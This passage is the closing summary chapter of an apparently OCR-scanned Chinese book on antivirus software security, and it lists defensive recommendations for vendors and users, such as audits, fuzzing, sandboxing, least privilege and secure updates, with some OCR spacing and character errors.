些 反 病毒 测评 机 构 ( 此 处 隐 去 测评 机 构 名 称 ) 的 测试 样本 中 还 会 有 至 少 五 年 以 前 的 病毒 样本 。 之 
前 我 为 反 病 毒 厂商 工作 的 时 候 ， 要 去 更 改 通 过 反 病 毒 测评 机 构 提 供 的 病毒 样本 数据 库 发 现 的 
MS-DOS 病 毒 侦 测 程序 中 的 漏洞 ， 实 在 非常 痛 苗 。 如 果 反 病毒 厂商 在 删除 了 一 些 已 经 废弃 的 侦 测 
程序 代码 后 , 在 一 些 测评 机 构 的 测评 中 分 数 降低 , 这 时 候 就 要 对 该 机 构 的 测评 是 否 有 意义 表示 怀 
疑 了 。 如 果 反 病毒 厂商 追求 的 是 技术 而 非 公关 推广 的 话 ， 应 该 避免 进行 此 类 无 意义 的 测评 ， 因 为 
此 类 测评 只 能 在 公关 层面 给 反 病 毒 产品 贴 金 ， 而 不 能 实 实在 在 提升 反 病毒 产品 的 质量 。 







































































17.3 总 结 


在 本 书 的 最 后 一 章 , 我 分 享 了 一 些 关于 反 病 毒 厂 商 如 何 利用 书 中 谈 到 的 一 些 知 识 来 改进 其 未 

发 布 的 安全 套装 和 反 病 毒 软件 质量 的 想法 和 经 验 。 

让 我 们 来 总 结 一 下 相关 改进 建议 。 

O 对 开发 工程 师 进行 安全 意识 培训 ， 编 写 安全 的 程序 代码 ” 反 病 毒 厂 商 的 开发 工程 师 并 不 
一 定 有 足够 的 安全 意识 。 这 与 开发 工程 师 的 开发 能 力 无 关 。 如 果 没 有 足够 的 安全 意识 ， 
开发 工程 师 很 可 能 会 写 出 易 受 攻击 的 程序 。 

O 进行 常规 安全 审计 这 是 我 可 以 给 出 的 最 佳 建议 之 一 。 相 关 产 品 完成 开发 以 后 ， 安 全 工 

程 师 需 要 对 相关 代码 进行 内 部 审计 。 最 好 还 可 以 请 第 三 方 审计 机 构 对 源 代码 进行 审计 ， 
很 多 时 候 你 会 惊讶 地 发 现 ， 这 些 第 三 方 机 构 还 能 从 你 的 代码 中 发 现 漏洞 。 

Q 模糊 测试 ”第 13 章 详细 阐释 了 模糊 测试 及 其 重要 性 。 简 而 言 之 ， 在 整个 开发 过 程 中 ， 需 

要 将 模糊 测试 作为 产品 安全 性 测试 和 质量 评 佑 、 控 掘 并 发 现 漏洞 的 重要 手段 之 一 。 

口 使 用 沙 盒 保 护 技术 “和 现代 浏览 器 不 同 ， 并 不 是 所 有 反 病 毒 软件 都 带 有 沙 盒 。 如 果 无 法 
百分之百 保证 代码 安全 性 ， 强 烈 建议 将 要 处 理 类 似 网 络 流量 包 、 电 子 邮件 附件 等 不 可 信 
传人 文件 的 代码 放 和 人 沙 盒 环 境内 执行 。 

口 安全 使 用 权限 “要 正确 设置 并 使 用 系统 对 象 和 文件 的 ACL。 此 外 ， 还 要 避免 使 用 不 必要 

的 高 权限 。 本 书 第 10 章 讨论 了 不 设置 或 错误 地 设置 权限 可 能 会 导致 权限 提升 类 漏洞 。 

口 减少 解析 器 内 的 危险 代码 ”可 以 通过 合理 的 软件 设计 ， 编 写 安全 的 代码 或 进行 常规 代码 
审计 来 减少 解析 器 内 的 危险 代码 。 此 外 ,设计 软件 的 时 候 ， 将 可 能 会 执行 具有 潜在 威胁 
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的 用 于 解析 文件 的 代码 放 入 沙 盒 环 境 运行 ， 或 为 其 分 配 较 低 的 权限 。 同 样 ， 如 果 可 以 的 
话 ， 从 内 核 态 驱动 或 系统 服务 中 ， 移 除 编译 的 文件 格式 解析 任务 ， 转 而 分 配给 沙 盒 内 用 
户 态 进程 。 如 果 可 以 的 话 ， 使 用 解释 型 语言 或 托管 式 代 码 进行 编写 。 

口 改进 升级 服务 和 协议 的 安全 性 ” 简 而 言 之 ， 仪 仅 验 证 传输 文件 的 内 容 远 远 不 够 。 安 全 的 
做 法 是 ， 使 用 安全 的 传输 通道 ， 并 辅 之 以 合理 的 加 密 技术 ， 来 保证 更 新 文件 的 合法 和 完 
整 性 。 该 话题 在 本 书 第 5 章 有 所 讨论 。 

O 删除 或 禁用 旧 代 码 ” 反 病毒 软件 随时 间 逐 渐 壮大 。 新 的 侦 测 和 感染 修复 程序 会 时 常 被 加 
和 人 进来， 因此 这 类 代码 很 有 可 能 是 不 可 维护 的 且 存 在 不 安全 代码 。 想 象 一 下 十 几 年 前 编 
写 的 感染 修复 程序 。 回 到 现在 ， 安 全 的 开发 原则 还 没有 深入 到 所 有 广 商 的 开发 过 程 中 ， 
因此 攻击 者 可 以 使 用 修改 过 的 旧 样 本 来 攻破 反 病 毒 软 件 。 

记 住 了 上 述 要 点 后 ,我 们 还 需要 知道 ,保护 计算 机 安全 的 责任 并 不 完全 在 于 反 病 毒 厂 商 一 方 。 

作为 个 人 或 企业 ， 我 们 也 需要 了 解 并 采取 措施 保护 计算 机 的 安全 。 

O 盲目 信任 是 错误 的 ”正如 第 1 章 中 讨论 的 那样 ， 反 病毒 软件 并 不 是 完美 无 瑕 的 防护 盾 ， 安 

装 了 反 病 毒 软件 并 不 能 等 同 于 电脑 就 百分之百 安全 了 。 反 病毒 软件 和 其 他 所 有 软件 一 样 
存在 弱点 。 除 了 安全 缺陷 外 ， 反 病毒 软件 也 不 能 防御 用 户 所 犯 的 错误 ， 比 如 中 了 社会 工 
程 学 攻击 的 招数 。 用 户 ( 尤其 是 计算 机 相关 知识 不 足 的 用 户 ) 经 常 认为 反 病 毒 软件 就 是 
安全 的 完美 守护 者 。 

O 反 病 毒 产 品 基于 特征 码 、 启 发 式 引 擎 和 动静 态 分 析 技 术 侦 测 已 知 的 安全 威胁 ”除非 相关 
病毒 的 感染 模式 (行为 或 静态 提取 的 代码 结果 ) 已 知 ， 和 否则 反 病 毒 软件 无 法 侦 测 未 知 以 
及 新 型 的 安全 危害 。 本 书 的 第 二 部 分 主要 探讨 了 这 一 点 。 

口 恶意 软件 的 变种 和 新 型 感染 以 及 绕 过 反 病 毒 软件 的 技术 ， 上 比 反 病毒 厂商 防御 和 侦 测 恶意 

软件 的 速度 要 快 得 多 有 一 句 话 讲 得 好 :“ 破 坏 总 比 建设 来 得 容易 。” 

口 隔离 反 病 毒 软件 进行 网 络 分 析 的 机 器 ， 来 加 固 防护 ”最 后 一 件 需要 提防 的 事情 是 ， 攻 击 
者 将 反 病 毒 软 件 作为 渗透 内 部 网 络 的 入 口 。 比 如 ， 反 病毒 邮件 网 关 或 防火 墙 的 漏洞 会 为 
攻击 者 敞开 渗透 内 部 网 络 的 大 门 ， 之 后 攻击 者 便 可 以 窃取 商业 机 密 数 据 了 。 

总 之 ,计算 机 安全 领域 仍 在 莲 勃 发 展 , 未 来 定 将 充满 无 限 美好 。 本 书 可 能 无 法 预测 将 来 出 现 

的 新 兴安 全 技术 ， 但 我 们 现在 可 以 做 的 是 小 心 行 事 并 明智 地 选择 反 病 毒 解决 方案 。 

正如 我 们 无 比 享受 本 书 的 编写 过 程 一 样 ， 希 望 大 家 喜欢 并 能 从 书 中 受益 。 
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